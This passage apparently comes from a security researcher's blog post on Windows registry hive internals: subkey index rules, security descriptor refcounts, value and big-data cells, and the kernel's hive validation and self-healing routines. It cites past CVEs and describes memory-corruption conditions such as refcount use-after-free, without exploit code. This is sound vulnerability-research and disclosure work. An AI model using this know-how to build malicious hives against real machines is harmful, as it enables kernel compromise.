    Notably, there are also some constraints that seem very natural, but are in fact not enforced by the Windows kernel:

    • There is no requirement that the format of a leaf-type index must be consistent with the version of the hive: instead, every one of li/lf/lh types are accepted for every hive version 1.3 – 1.6. The most glaring example of this behavior is that hash leaves are allowed in hive versions 1.3 and 1.4, even though they were historically only introduced in version 1.5 of the format.
    • There is no requirement that all the leaf indexes referenced by a root index are all of the same type. In fact, a single subkey list may consist of an arbitrary combination of index leaves, fast leaves and hash leaves, and the kernel must handle such situations gracefully.
    • Beyond the fact that none of the actively used subkey indexes may be empty, there are no limitations with regards to how the subkeys are laid out in the data structure. For example, the existence of a root index doesn't automatically indicate that there are many subkeys on the list: there may as well be a single root index, pointing to a single leaf, containing a single subkey. It is also allowed for several leafs being part of a single root index to have wildly different counts, with some single-digit ones coexisting with others around the 64K mark. The kernel doesn't ensure any advanced "balancing" of the subkey index by default – it does split large leafs into smaller ones, but only while adding a new subkey, and not during the loading of an existing hive.

    Three examples of kernel vulnerabilities that were directly related to the handling of subkey lists are: CVE-2022-37956 (integer overflows in registry subkey lists leading to memory corruption), CVE-2022-38037 (memory corruption due to type confusion of subkey index leaves in registry hives) and CVE-2024-26182 (subkey list use-after-free due to mishandling of partial success in CmpAddSubKeyEx). I personally find the first one (CVE-2022-37956) particularly interesting, because the hive memory corruption could be triggered with the right sequence of API calls, or even just command-line reg.exe tool invocations. Granted that the number of required operations was quite high (around 66 million), but it still goes to show that being intimately familiar with the inner workings of the target software may open new avenues of exploitation that would otherwise not be available. For a detailed explanation of the subkey list management logic, see the next section.

    Internal Windows logic of handling subkey lists

    On top of the requirements and restrictions imposed by the regf format itself, there are some further characteristics of most registry hives found on real systems, caused by some decisions implemented in the logic of the Windows kernel. The most important thing to note is that, as mentioned above, the kernel operates on any subkey list lazily, only when there is a need to do so due to a key being added/deleted in the registry. Therefore, a weirdly formatted (but adhering to the bare regf requirements) subkey index will remain in this state after loading, for as long as a client application doesn't decide to change it.

    Most of the relevant high-level logic of handling subkey lists takes place when adding new keys, and is illustrated in the flow chart below:

    Complex flow chart describing the high-level logic handling of the subkey lists when ading new keys

    The general high-level function that implements the above logic in the Windows kernel is CmpAddSubKeyEx, which then calls a few helper routines with mostly self-descriptive names: CmpAddSubKeyToList, CmpSelectLeaf, CmpSplitLeaf and CmpAddToLeaf. Compared to addition, the process of deleting a key from the list is very straightforward, and is achieved by removing it from the respective leaf index, freeing the leaf if it was the last remaining element, and freeing the root index if it was present and the freed leaf was its last remaining element. There are no special steps being taken other than the strictly necessary ones to implement the functionality.

    Given the above, we can conclude that registry hives created organically by Windows generally adhere to the following set of extra rules:

    • The leaf types being used are in line with the version of the hive: index and fast leaves for versions ≤1.4, and hash leaves for versions ≥1.5.
    • All leaves within a single index root have the same type.
    • Index leaves never contain more than 1012 elements.
    • Once a root index is created for a key, it is never downgraded back to a single leaf index other than through the deletion of all subkeys, and creating a new one starting from an empty subkey list.

    Security descriptors

    Security descriptors play a central role in enforcing access control to the information stored in the registry. Their significance is apparent through the fact that they are the only mandatory property of registry keys, as opposed to classes, values and subkeys which are all optional. At the same time, large groups of keys typically share the same security settings, so it would make little sense to store a separate copy of the data for every one of them. For example, in a default installation of Windows 11, the SOFTWARE hive includes around 250,000 keys but only around 500 unique security descriptors. This is why they are the only type of cell in the hive that can be associated with multiple keys at the same time. By only storing a single instance of each unique descriptor in the hive, the system saves significant disk and memory space. However, this efficiency requires careful management of each descriptor's usage through reference counting, which ensures they can be safely freed when no longer needed.

    When loading a hive, the kernel enumerates all of its security descriptors without having to traverse the entire key tree first. In order to make this possible, security descriptors in the stable space are organized into a doubly-linked list, starting at the descriptor of the root key. Internal consistency of this list is mandatory – if any inconsistencies are found, it is reset to become a single-entry list with just the root security descriptor and nothing else. If the root security descriptor itself is corrupted, the hive is deemed to be in an unrecoverable state and rejected completely.

    While traversing the global list, the kernel also verifies that the binary encoding of the security descriptors is valid and safe to pass to internal security-related functions later in time. In the hives, descriptors are formatted as self-contained blobs of bytes adhering to the SECURITY_DESCRIPTOR_RELATIVE structure layout. Compared to other hive cells (key nodes etc.), the internal format of security cells is relatively complex: it is variable in size and contains multiple sub-structures (SIDs, ACLs, ACEs), length indicators and internal offsets. To detect any potential corruption early, the RtlValidRelativeSecurityDescriptor function must succeed for every descriptor in a newly loaded hive, otherwise the previously discussed fallback logic takes place.

    The last step in the security descriptor validation process is to make sure that the reference counts specified in the hive are equal to the actual number of references from registry keys. This is achieved by re-counting the references when traversing the key tree structure of the hive, and later checking if the values found in _CM_KEY_SECURITY.ReferenceCount are in line with the regenerated counts. If the two values are unequal, the refcount in the security cell is adjusted to reflect the correct number of references. This is critical for system security, because operating on an invalid refcount – especially an inadequately small one – may directly lead to exploitable memory corruption conditions.

    Some examples of historical vulnerabilities related to the three fundamental aspects of security descriptor consistency are as follows:

    A high-level illustration of a security descriptor linked list consisting of three elements is shown in the diagram below:

    A high-level illustration of a security descriptor linked list consisting of three elements

    Security cell format

    Let's now have a look at the specific layout of the security cells. They are represented by the _CM_KEY_SECURITY structure, whose definition is shown in the WinDbg format below:

    0: kd> dt _CM_KEY_SECURITY

    nt!_CM_KEY_SECURITY

       +0x000 Signature        : Uint2B

       +0x002 Reserved         : Uint2B

       +0x004 Flink            : Uint4B

       +0x008 Blink            : Uint4B

       +0x00c ReferenceCount   : Uint4B

       +0x010 DescriptorLength : Uint4B

       +0x014 Descriptor       : _SECURITY_DESCRIPTOR_RELATIVE


    Each of its fields is discussed in more detail in the following subsections.

    Signature

    The magic bytes of this cell type, equal to 0x6B73 ('sk'). It exists for informational purposes only, but isn't used for anything at runtime – it isn't even verified on hive load, and can therefore be anything in a binary-controlled hive.

    Reserved

    An unused field that may contain arbitrary data; never accessed by the kernel.

    Flink and Blink

    As discussed earlier, these are the forward and backward links in the security descriptor list. They must always be kept in a valid state. In a single-element list, Flink/Blink point at themselves – that is, at the security descriptor they are both part of.

    ReferenceCount

    This single field was arguably responsible for the most registry-related vulnerabilities out of all of the hive structures. It is a 32-bit unsigned integer that expresses the number of objects that actively rely on this security descriptor, which mostly means the key nodes associated with it, but not only. Whenever this member gets out of sync with the real number of references, it may lead to serious memory corruption primitives, so it is very important that the kernel ensures its correct value both on hive load and during any subsequent operations. The two prevalent risks are that:

    • The refcount gets too small: when this happens, it is possible that the cell gets freed while some objects still hold active references to it. This leads to a straightforward use-after-free scenario, and in my experience, it is easily exploitable by a local attacker.
    • The refcount gets too large: this situation doesn't immediately lead to memory corruption, but let's remember that the structure member has a limited, 32-bit width. If an attacker were able to indiscriminately increment the counter without real references to back it up, they could eventually get it to the maximum uint32 value, 0xFFFFFFFF. For many years, the Windows kernel hasn't implemented any protection against registry refcount integer overflows, so another incrementation of the field after 0xFFFFFFFF would wrap it back to zero, which brings us to the previous scenario of an inadequately small count. However, following some bug reports and discussions, Microsoft has gradually added overflow protection in the relevant, internal functions, starting in April 2023 and eventually landing the last missing check in November 2024. Thanks to this effort, I believe that as I am writing this, security descriptor refcount leaks should no longer be an exploitable condition.

    Under most circumstances, the value of the refcount is somewhere between 1 and ~24.4 million (the maximum number of keys in a hive given the space constraints). However, it is interesting to note that it might be legitimately set to a greater value. Consider the following: immediately after loading a hive, all security refcounts are exactly equal to the number of keys associated with them. But, key nodes globally visible in the registry tree are not the only ones that can reference security cells; there may be also keys that have been created in the scope of a transaction and not committed yet, as well as pending, transacted operations of changing the security properties of a key (marked by the UoWAddThisKey and UoWSetSecurityDescriptor enums of type UoWActionType). They too may increase the refcount value beyond what would normally be possible with just regular, non-transacted keys. This phenomenon has been discussed in detail in the CVE-2024-43641 bug report.

    Overall, reference counts are of great importance to system security, and every registry operation that involves it deserves a thorough security assessment.

    DescriptorLength

    This is the length of the security descriptor data (i.e. the size of the Descriptor array) expressed in bytes. It's worth noting that the format doesn't force it to be the minimum length sufficient to store the binary blob. This means that the overall cell length must be greater than DescriptorLength + 20 (i.e. the declared length of the descriptor plus the _CM_KEY_SECURITY header), and in turn DescriptorLength must be greater than the actual size of the descriptor. Both cases of the cell size or the DescriptorLength having non-optimal values are accepted by the kernel, and the extra bytes are ignored.

    Descriptor

    This variable-length array stores the actual security descriptor in the form of the SECURITY_DESCRIPTOR_RELATIVE structure. It doesn't necessarily have to be formatted in the most natural way, and the only requirement is that it successfully passes the RtlValidRelativeSecurityDescriptor check with the RequiredInformation argument set to zero. This means, for example, that the Owner/Group/Sacl/Dacl components may be spread out in memory and have gaps in between them, or conversely, that their representations may overlap. This was one of the main contributing factors in CVE-2022-35768, but the fix was to more accurately calculate the length of irregularly-encoded descriptors, and the freedom to structure them in non-standard ways has remained. It is even possible to use a completely empty descriptor without any owner or access control entries, and such a construct will be acknowledged by the system, too.

    Another somewhat interesting fact is that security descriptors are meant to be deduplicated, so naturally whenever a user assigns a security descriptor that already exists in the hive, it is simply reused and its reference count is incremented. However, again, the format (or rather its canonical implementation in Windows) doesn't force the uniqueness requirement upon the security descriptors in hives loaded from disk. So, even though they would be never created by the OS itself, multiple identical copies of a descriptor are allowed in specially crafted hives and may co-exist without (seemingly) causing any issues for the kernel.

    The access rights defined by the security descriptors are based on permissions specific to the registry and its operations, so there is an access mask dedicated to creating keys (KEY_CREATE_SUB_KEY), reading values (KEY_QUERY_VALUE), writing values (KEY_SET_VALUE), and so on. They all have self-descriptive names and are well-documented in Registry Key Security and Access Rights, so we won't spend more time discussing them here.

    Security descriptors of volatile keys

    Similarly to every other property of a registry key, the storage type of a security descriptor always matches the type of its associated key(s). This means that a stable key will always use a stable descriptor, and a volatile key – a volatile descriptor. It is the only "exception" to the rule that security descriptors are deduplicated and unique within the scope of the hive. If there are two keys with identical security settings but different storage types, they will reference two distinct security descriptor cells via their _CM_KEY_NODE.Security fields, one with the highest bit set and the other with the bit clear. The descriptors stored on both sides are subject to the same rules with regards to reference counting, allocating and freeing.

    Furthermore, we have previously discussed how all security descriptors in a hive are connected in one global doubly-linked list, but this only applies to the descriptors in the stable space. The functionality is needed so that the descriptors can be enumerated by the kernel when loading a hive from disk, and since volatile descriptors are in-memory only and disappear together with their corresponding keys on hive unload or a system shutdown, there is no need to link them together. The internal CmpInsertSecurityCellList function takes this into account, and points the Flink/Blink fields at themselves, making each volatile descriptor a single-entry list in order to keep it compatible with the list linking/unlinking code. This behavior is illustrated in the diagram below, with two volatile security descriptors each being in their own pseudo-list:

    Diagram described in the paragraph above, showing two security descripitors capybara and sloth

    This slight quirk is the reason why the ability to create stable keys under volatile ones, which should normally not be possible, may be an exploitable condition with security impact. For details, see the "Creation of stable subkeys under volatile keys" section in the CVE-2023-21748 bug report, or the CVE-2024-26173 bug report.

    Security descriptors in app hives

    In normal registry hives, there are no artificial restrictions with regards to security descriptors. There may be an arbitrary number of them, and they may contain any type of settings the user wishes, as long as they have binary control over the hive file and/or the existing security descriptors grant them the access to change them to whatever they want. However, there are some limitations concerning security descriptors in application hives, as documented in the MSDN page of the RegLoadAppKeyA function:

    All keys inside the hive must have the same security descriptor, otherwise the function will fail. This security descriptor must grant the caller the access specified by the samDesired parameter or the function will fail. You cannot use the RegSetKeySecurity function on any key inside the hive.

    The intent behind the quote seems to be that the security settings within an app hive should be uniform and immutable; that is, remain identical to their initial state at hive creation, and consistent across all keys. There is indeed some truth to the documentation, as trying to change the security of a key within an app hive with RegSetKeySecurity, or to create a new key with a custom descriptor both result in a failure with STATUS_ACCESS_DENIED. However, the part about all keys having the same security descriptor is not actually enforced, and a user can freely load an app hive with any number of different security descriptors associated with the keys. This was reported to Microsoft as WinRegLowSeverityBugs issue #20, but wasn't deemed severe enough to be addressed in a security bulletin (which I agree with), so for now, it remains an interesting discrepancy between the documentation and implementation.

    Key values and value lists

    While keys allow software to create a data organization hierarchy, values are the means of actually storing the data. Each value is associated with one specific key, and is characterized by the following properties:

    • Name
    • Type
    • Data

    In general, values are much simpler than keys. To begin with, they are not a full-fledged object in the NT Object Manager sense: you cannot open a handle to a value, and thus you may only access them through the handle of its associated key and its name. They also don't have dedicated security descriptors, so a client with a key handle with the KEY_QUERY_VALUE access can enumerate and read all values of the key, and the KEY_SET_VALUE rights allows the caller to create/modify/delete all values within a key. For these reasons, values are best thought of as elaborate attributes of a key, not as an independent entity.

    There is no fixed limit on the number of values associated with a key other than the available hive space, which places the number at around 67 million (0x80000000 ÷ 0x20, the hive space divided by the minimum value cell size). The value list format is also not as optimized as the subkey index is: it is a linear, single-level list with just the raw value cell indexes, without any additional metadata like a header or hints. The list is not sorted either, and their order is defined by when they were added to the key. Finally, value name uniqueness is guaranteed on output, but not enforced on input: it is possible to load a specially crafted hive with several values with the same name, and contrary to duplicate keys, this doesn't seem to pose any fundamental problems for the registry implementation.

    A high-level overview of the hive cells related to a key's value list is shown below:

    Diagram showing the high-level overview of the hive cells related to a key's value list

    In the next section, we will examine the internal layout and semantics of the _CM_KEY_VALUE structure, which describes each unique value in the registry.

    The key value cell

    As usual, we can print out the structure definition in WinDbg:

    0: kd> dt _CM_KEY_VALUE

    nt!_CM_KEY_VALUE

       +0x000 Signature        : Uint2B

       +0x002 NameLength       : Uint2B

       +0x004 DataLength       : Uint4B

       +0x008 Data             : Uint4B

       +0x00c Type             : Uint4B

       +0x010 Flags            : Uint2B

       +0x012 Spare            : Uint2B

       +0x014 Name             : [1] Wchar


    Let's examine each field more closely.

    Signature

    It identifies the cell as a key value, and must be equal to 0x6B76 ('vk'). It is verified during hive load, but isn't used for anything else later on.

    NameLength and Name

    The combination of these two fields specifies the name of the value: NameLength indicates the length of the string in bytes, and Name is an inline, variable-length buffer that stores the name itself. Let's consider the same criteria of the name that we have previously discussed in the context of registry keys:

    • Compression: Similarly to keys, value names may be compressed if the VALUE_COMP_NAME (0x1) flag is set in _CM_KEY_VALUE.Flags. In that case, the string is stored as 8-bit ASCII characters, otherwise the normal wide-character encoding is used.
    • Length: The length of the name can be between 0 and 16,383 characters. A length of zero indicates an alias for the value displayed by Regedit as "(Default)", a remnant of the design from Windows 3.1 where data was assigned directly to keys. As a sidenote, the correct enforcement of the upper limit was only introduced in October 2022 as a fix for CVE-2022-37991.
    • Charset: All characters in the 0x0000 – 0xFFFF range are allowed in a value name, with no exceptions. Since values are not part of the same namespace as keys, this even includes backslashes. The only constraint is that if the corresponding key is a symbolic link, then the value must be named "SymbolicLinkValue", as it has a special meaning and stores the link's target path. An example of a bug related to sanitizing value names was CVE-2024-26176.
    • Uniqueness: Value name uniqueness is not enforced on input, but it is maintained by the kernel at runtime on a best-effort basis. That means that whenever setting a value, the system will always try to reuse an existing one with the same name before creating a new one. Similarly to keys, value lookup is performed in a case-insensitive manner, but the original casing is preserved and visible to the clients.
    DataLength

    Specifies the length of the data stored in the value. The various ranges of the 32-bit space that the field can fall into are explained below:

    DataLength

    Hive versions < 1.4

    Hive versions ≥ 1.4

    0x0

    Empty value, `Data` must be set to HCELL_NIL.

    0x1 – 0x3FD8

    Data stored directly in a backing cell pointed to by `Data`.

    0x3FD9 – 0xFFFFC

    Data stored directly in a backing cell pointed to by `Data`.

    Data split into 16344-byte chunks and saved in a big data object pointed to by `Data`.

    0xFFFFD – 0x3FD7C028

    Invalid.

    0x3FD7C029 – 0x7FFFF000

    Not accepted on input due to a 16-bit integer overflow in the big data chunk count. Feasible to set at runtime, but the saved data will be truncated due to the same bug / design limitation.

    0x7FFFF001 – 0x7FFFFFFF

    Invalid

    0x80000000 – 0x80000004

    Between 0–4 bytes stored inline in the `Data` field.

    0x80000005 – 0xFFFFFFFF

    Invalid.

    Data

    Responsible for storing or pointing to the data associated with the value. To summarize the table above, it can be in one or four states, depending on the data length and hive version:

    1. Empty – equal to HCELL_NIL, if DataLength is 0.
    2. Inline – stores up to four bytes in the Data member of the value cell itself, as indicated by DataLength & 0x7FFFFFFF, if the highest bit of DataLength is set. As a side effect, an empty value can be represented in two ways: either as DataLength=0 or DataLength=0x80000000.
    3. Raw data – points to a raw backing cell if Hive.Version < 1.4 or DataLength ≤ 0x3FD8.
    4. Big data – points to a big data structure introduced in hive version 1.4, which is capable of storing 0xFFFF × 0x3FD8 = 0x3FD7C028 bytes (a little under 1 GiB). More on big data cells in the section below.
    Type

    This field is supposed to store one of the supported value types, such as REG_DWORD, REG_BINARY, etc. We'll omit a thorough discussion of the official types, as we feel they are already well documented and understood. From a strictly technical point of view, though, it's important to note that the type is simply a hint, an extra piece of metadata that is available to a registry client with the intended purpose of indicating the nature of the value. However, Windows provides no guarantees with regards to the consistency between the value type and its data. For instance, a REG_DWORD value doesn't have to be four-bytes long (even though it conventionally is), a REG_SZ unicode string can have an odd length, and so on. Any client application that operates on user-controlled data from the registry should always check the specific properties it relies on, instead of unconditionally trusting the value type.

    Beyond this flexibility in data interpretation, there's another aspect of the Type field to consider: its potential for misuse due to its 32-bit width. The kernel generally doesn't perform any verification that its numerical value is one of the small, predefined enums (other than to ensure REG_LINK for symbolic links and REG_NONE for tombstone values), so it is possible to set it to any arbitrary 32-bit value, and have it returned in exactly the same form by system APIs such as RegQueryValueEx. If a program or driver happens to use the value type returned by the system as a direct index into an array without any prior bounds checking, this could lead to out-of-bounds reads or memory corruption. In some sense, it would probably be safest for the most critical/privileged software in the system (e.g. antivirus engines) not to use the value type at all, or only within a very limited scope.

    Flags

    There are currently two supported flags that can be set on registry values:

    • VALUE_COMP_NAME (0x1) – equivalent to KEY_COMP_NAME, indicates that the value name representation is a tightly packed string of ASCII characters.
    • VALUE_TOMBSTONE (0x2) – used exclusively in differencing hives (version 1.6) to indicate that a value with the given name has been explicitly deleted and doesn't exist on this key layer. It requires that the value type is REG_NONE and it doesn't contain any data. It is equivalent to the Tombstone (1) property of a key set in the LayerSemantics field of a key node.
    Spare

    Unused member, never accessed by the kernel.

    Big data value storage

    Prior to hive version 1.4, the maximum length of a value in the registry was 1 MB, which was directly related to the maximum length of the single backing cell that would store the raw data. This limitation is documented in the Registry element size limits article:

    Registry element

    Size limit

    Value

    • Available memory (latest format) [editor's note: this is not fully accurate]
    • 1 MB (standard format)

    Here, "standard format" refers to regf v1.3. On some level, 1 MB could be considered a reasonable limit, as the registry was not designed to serve as storage for large quantities of data – at least not initially. One example of a public resource which vocalized this design decision was the old Windows registry information for advanced users article from around 2002-2003, which stated:

    Long values (more than 2,048 bytes) must be stored as files with the file names stored in the registry.

    Nevertheless, it seems that at some point during the development of Windows XP, Microsoft decided to provide the registry clients with the ability to store larger chunks of data, not bound by the somewhat arbitrary limits of the regf format. In order to facilitate this use case, a new cell type was added, called the "big data". Conceptually, it is simply a means of dividing one long data blob into smaller portions of 16344 bytes, each stored in a separate cell. It replaces the single backing cell with a _CM_BIG_DATA structure defined as follows:

    0: kd> dt _CM_BIG_DATA

    nt!_CM_BIG_DATA

       +0x000 Signature        : Uint2B

       +0x002 Count            : Uint2B

       +0x004 List             : Uint4B


    The signature is set to 0x6264 ('db') and verified on hive load, but otherwise not used. The count represents the number of 16344-byte chunks making up the overall value, and is generally supposed to be set to an integer between 2–65535. Otherwise, if it was set to 0, that would mean that the value is empty so the big data object shouldn't be present at all. If it was equal to 1, a direct backing buffer should have been used instead, so such a construct would also be invalid. Neither zero nor one are thus accepted by the hive loader, but it is technically possible to set these values at runtime by abusing the aforementioned integer overflow bug. We haven't found any security impact of this behavior other than it being a correctness error, though.

    The last element of the structure, List, is a cell index to a basic array of cell indexes making up the value chunks. Its format is equivalent to that of the value list, which also stores just the HCELL_INDEX values without any headers or additional information. Furthermore, every chunk other than the last one must contain exactly 16344 bytes. If the length of the overall value is not divisible by 16344, the final chunk contains the remaining 1–16343 bytes. The layout of the big data object and its associated cells is shown in the diagram below:

    The layout of the big data object and its associated cells

    This concludes the part about the internal format of registry hives.

    The hive loading and sanitization process

    The hive loading process implemented by the NtLoadKey* family of system calls is a long and complex operation. It involves opening the hive file, loading it in memory, verifying its integrity, optionally recovering state from transactional log files, allocating any related kernel objects, attaching the hive to the global registry tree, and optionally opening a handle to the hive root and returning it to the caller. In this blog post, we are particularly interested in the hive sanitization part. Understanding this portion of the registry code is like consulting the official specification – or even better, as the code doesn't lie and is essentially the ground truth of what is and isn't accepted as valid data. Furthermore, it provides us with a number of hints as to which properties of the format are imperative to the correct functioning of the database, and which ones are more conventional, and don't have any serious consequences even if broken. The goal of this section is to discuss the overall control flow of loading a hive and performing the initial pass of sanitization. By documenting which internal routines are responsible for which checks, we hope to make it easier for other security researchers to navigate the hive loading code, providing a good starting point for their own investigations.

    The registry, as a logical structure, is built on top of several lower-layer abstractions, each of which has a number of invariants that must hold in order for the hive to be considered valid, and in order for operations being performed on the hive to be safe. This is illustrated in the pyramid below, with the most foundational requirements placed at the bottom, and the increasingly more general aspects of hive integrity towards the top:

    Diagram in the shape of a pyramid, with five levels. The base level showing the hive header, bin and cell layout consistency, and the top level showing Correctness of global hive properties, with all levels described below this image with examples

    Let's consider some examples of validity checks at each level, starting with the most fundamental ones:

    1. Hive header, bin and cell layout consistency
      • Validity of the hive version, length, root cell index, flags in the header.
      • Existence of at least one bin in the hive.
      • Validity of each bin's header, particularly the file offset and size.
      • Validity of cells: aligned to eight bytes, within the bounds of the bin, completely filling out the bin.
    2. Intra-cell consistency
      • Sufficient size of each cell with regards to the data it stores: at least the minimum size for the cell type (e.g. 0x4e for the key node), plus adequate to any variable-length internal arrays, such as the key name or value name.
      • Correct signatures being set for every kind of cell depending on its function.
      • Valid combinations of flags being set in key nodes and values.
      • Strings (key names, value names) adhering to the format requirements regarding minimum and maximum lengths, charset, etc.
    3. Inter-cell consistency
      • Valid references to cells in cell indexes, and each allocated cell only being used for one specific purpose.
      • Consistency between copies of redundant data in separate cells: e.g. _CM_KEY_NODE.SubKeyCounts[...] vs. the length of the subkey index.
      • Consistency between length markers in one cell vs. the amount of data stored in the corresponding backing buffer (e.g. _CM_KEY_VALUE.DataLength vs. length of the data stored in the raw data cell / big data cell).
      • Correct hints in subkey indexes (fast leaves, hash leaves).
      • Correct reference counts in the security descriptors.
    4. Structural correctness of high-level constructs
      • Consistency of the linked list of security descriptors.
      • Subkeys being laid out in a lexicographical order in all subkey indexes.
      • Symbolic link keys having a single value named "SymbolicLinkValue" of type REG_LINK.
      • Subkeys in the stable space always having a non-volatile parent.
    5. Correctness of global hive properties
      • Each hive always containing at least one key (the root key) and at least one security descriptor.
      • Only the root of the hive, and no other key having the KEY_HIVE_ENTRY flag set.
      • The depth of the hive's tree structure being a maximum of 512 levels.

    As we can see, there are a variety of constraints that require verification when loading a hive, with the more abstract ones relying on the lower-layer ones to be confirmed first. It explains why the process is by far the most complex operation one can perform on the registry, spanning across thousands of lines of code and dozens of functions. To better illustrate this process, I've outlined the most important hive validation functions below, indented to show their hierarchical relationships as they execute in the kernel:

    • NtLoadKey* → CmLoadDifferencingKey → CmLoad(App)Key
      • CmpCmdHiveOpen → CmpInitHiveFromFile → CmpCreateHive
        • HvHiveStartFileBacked → HvLoadHive
          • HvpGetHiveHeader
          • HvAnalyzeLogFiles
          • HvpPerformLogFileRecovery
          • HvpRemapAndEnlistHiveBins
            • HvpValidateLoadedBin
            • HvpEnlistFreeCells
        • CmCheckRegistry
          • HvCheckHive
            • HvCheckBin
          • CmpValidateHiveSecurityDescriptors
          • CmpCheckRegistry2
            • CmpCheckKey
              • CmpCheckValueList
              • CmpCheckLeaf
            • CmpCheckLexicographicalOrder
            • CmpCheckAndFixSecurityCellsRefcount
      • CmpLoadKeyCommon
        • CmpLinkHiveToMaster
          • ObOpenObjectByName → ... <NT Object Manager> ... → CmpParseKey → CmpDoParseKey
            • CmpUpdateHiveRootCellFlags

    Here is a short summary of each of the above functions, according to my own analysis and understanding:

    Function name(s)

    Description

    NtLoadKey*

    The four syscall entry points for loading registry hives, as discussed in the previous post: NtLoadKey, NtLoadKey2, NtLoadKeyEx, NtLoadKey3.

    CmLoadDifferencingKey

    A generic function for loading hives – not just differencing ones but every kind, contrary to what the name might suggest. Other than the syscall handlers, it is also called by VrpPreLoadKey and VrpLoadDifferencingHive, which are parts of the VRegDriver. It is responsible for sanitizing the input flags, checking the privileges of the caller, calling registry callbacks, invoking specialized functions to actually load the hive, and opening a handle to the root of the hive if the caller requested it.

    CmLoadKey,
    CmLoadAppKey

    Functions implementing the core functionality of loading normal and app hives, respectively. They are responsible for coordinating lower-layer loading functions, resolving any conflicts related to the hive file / registry mount path, and inserting the hive-related objects into the corresponding kernel data structures. In terms of opening and validating the binary hive representation, they are virtually equivalent.

    CmpCmdHiveOpen,
    CmpInitHiveFromFile,
    CmpCreateHive

    Functions dedicated to opening the hive file on disk, loading it in memory, validating its integrity and allocating the internal kernel structures (_CMHIVE and other objects representing the hive).

    HvHiveStartFileBacked,
    HvLoadHive

    Common functions for loading and sanitizing the hive on the level of header, bins and cells (the lowest level of the pyramid).

    HvpGetHiveHeader

    Reads and validates the hive header, trying to determine if it is valid or corrupted, and whether the header or hive data need to be recovered from a log file.

    HvAnalyzeLogFiles,
    HvpPerformLogFileRecovery

    Two most important functions related to data recovery from log files: the first one determines which of the two files (.LOG1/LOG2) to use, and the second one actually applies the log file entries to the hive mapping in memory.

    HvpRemapAndEnlistHiveBins,
    HvpValidateLoadedBin,
    HvpEnlistFreeCells

    Functions responsible for re-mapping the hive after log file recovery, in order to ensure that every bin is mapped as a continuous block of memory. During the process, the validity of all bins and the layout of their cells is verified.

    CmCheckRegistry

    A generic function encompassing the verification of levels ≥ 2 of the pyramid, i.e. everything about the hive that defines its logical structure and is not related to memory management. If any self-healing occurs during the process, the function restarts its logic, so it may potentially take multiple iterations before a corrupted hive is fixed up and accepted as valid.

    HvCheckHive,
    HvCheckBin

    Two functions responsible for validating the bin headers and layout of their cells. As you may have noticed, this part of their functionality is redundant with HvpValidateLoadedBin and HvpEnlistFreeCells. The difference is that the earlier functions are used to cache information about the positions of free cells in the hive, to optimize the allocation process later on. On the other hand, the underlying purpose of HvCheckHive and HvCheckBin is to generate a bitmap object (RTL_BITMAP) that indicates the positions of allocated cells, in order to ensure the validity of cell indexes when sanitizing the hive, and to make sure that every cell is only used for a single purpose in the hive.

    As a side note, there is an amusing bug in HvCheckBin related to verifying cell size correctness, but it seems to be non-exploitable precisely because the same sanitization is correctly performed earlier in HvpEnlistFreeCells.

    CmpValidateHiveSecurityDescriptors

    The function traverses the linked list of security descriptor cells, and verifies its consistency (the correctness of the Flink/Blink indexes) and the validity of the security descriptor blobs. At the same time, it also caches information about the descriptors in internal kernel structures, so that they can be quickly looked up when verifying the _CM_KEY_NODE.Security fields, and later at system run time.

    CmpCheckRegistry2

    A function responsible for performing a single attempt at validating the entire key structure. There are several possible return codes:

    • STATUS_SUCCESS if the hive validation passes without problems,
    • STATUS_REGISTRY_HIVE_RECOVERED if minor corruption was encountered, but it was successfully fixed in-place,
    • STATUS_RETRY if a badly corrupted key was encountered and removed from its parent's subkey index. This causes CmCheckRegistry to restart the validation process from scratch.
    • STATUS_REGISTRY_CORRUPT if the hive was found to be corrupted beyond repair.
    • Other problem-specific error codes such as STATUS_NO_LOG_SPACE or STATUS_INSUFFICIENT_RESOURCES, which cause the loading process to be aborted.

    CmpCheckKey

    This is the central function in the hive sanitization process, with more than a thousand lines of code in decompiled output, and likely just as many in the original source code. It essentially checks the validity of all fields within a specific key node, and also orchestrates the validation of the value list and subkey index associated with the key. If there was one function I would recommend analyzing to better understand the regf format, it would be this one.

    CmpCheckValueList

    Checks the consistency of a value list, each of the value cells on the list, and their backing buffers / big data objects.

    CmpCheckLeaf

    Validates a specific leaf subkey index, i.e. one of 'li', 'lf', 'lh'. This includes checking the cell size, signature, validity of the subkey cell indexes and their hint values.

    CmpCheckLexicographicalOrder

    Compares the name of two consecutive subkeys to determine if the second one is lexicographically greater than the first, in order to ensure the right sorting of a subkey index.

    CmpCheckAndFixSecurityCellsRefcount

    Iterates over all security descriptors in the hive, compares their refcounts loaded from disk with the values independently re-calculated while sanitizing the key tree, and corrects them if they are unequal. Since November 2024, it also frees any unused security descriptors with the reference count set to zero (they had been previously allowed, as described in WinRegLowSeverityBugs issue #10).

    CmpUpdateHiveRootCellFlags

    The function makes sure that the root key of the hive has the KEY_NO_DELETE and KEY_HIVE_ENTRY flags set. Interestingly, these flags are the only aspect of the regf format that is not enforced directly while loading the hive (in CmpCheckKey), but only at a later stage when the hive is being mounted in the global registry view.

    Self-healing properties

    The Windows implementation of the registry has the unique property that it is self-healing: the system tries very hard to successfully load a hive even if it's partially corrupted. My guess is that the reason for this design was to make the mechanism resilient against random data corruption on disk, as failure to load a system hive early during start-up would make Windows unusable. Perhaps it was decided that it was a better tradeoff to forcefully remove the broken parts of the file, with the hope that they would be automatically re-created later at run time, or that they weren't very important to begin with and the system/applications could continue to function correctly without them. And even if not, giving the user a chance to troubleshoot the problem or recover their data would still be a better outcome than bricking the machine completely.

    Consequently, whenever an error is detected by the hive loading logic, it is handled in one of several ways, depending on the nature of the problem:

    • Bin recreation: if HvpValidateLoadedBin indicates that any part of a bin header is corrupted, then HvpRemapAndEnlistHiveBins re-initializes it from scratch, and declares it as 4096 bytes long (regardless of the previous length).
    • Cell recreation: if HvpEnlistFreeCells detects a cell with an invalid length, it converts it to a single free cell spanning from the current offset until the end of the bin, potentially erasing any other data/cells previously residing in that region.
    • Small, direct fix: if a single field within a key node is found to have an invalid state, and the good/expected state is known to the kernel, the problem gets fixed by directly overwriting the old value with the correct one. Examples include cell signatures and mandatory/illegal flags.
    • Single value deletion: if any inconsistencies are found in a value cell or its associated data cell(s), the specific value is removed from the key's value list.
    • Deletion of entire value list: if the descriptor of a value list (i.e. its cell index or length) are invalid, or if a symbolic link contains more than one value, the entire value list of the key is cleared.
    • Single key deletion: if an irrecoverable problem is found within a key node (e.g. invalid cell index, invalid cell length, invalid name), then it is removed from its parent's subkey index, and the key tree validation process is restarted from scratch.
